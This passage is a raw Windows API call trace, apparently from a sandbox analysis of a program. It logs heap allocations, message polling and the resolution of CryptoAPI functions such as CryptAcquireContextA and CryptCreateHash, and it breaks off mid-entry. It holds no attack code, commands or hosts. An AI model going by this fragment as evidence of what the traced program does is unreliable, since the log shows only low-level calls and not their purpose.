lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.687] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0135.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0135.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0135.688] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0135.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0135.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69be8 [0135.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69be8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0135.806] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0135.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0135.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0135.807] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0135.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0135.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0135.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0135.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0135.809] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.810] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0135.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0135.810] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0135.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.810] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0135.810] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0135.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0135.810] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0135.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0135.811] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0135.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0135.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.812] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0135.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.813] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.813] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0135.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0135.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.813] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.813] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.813] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0135.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0135.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.813] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0135.814] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0135.814] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.814] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0135.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0135.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0135.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0135.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0135.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a10, 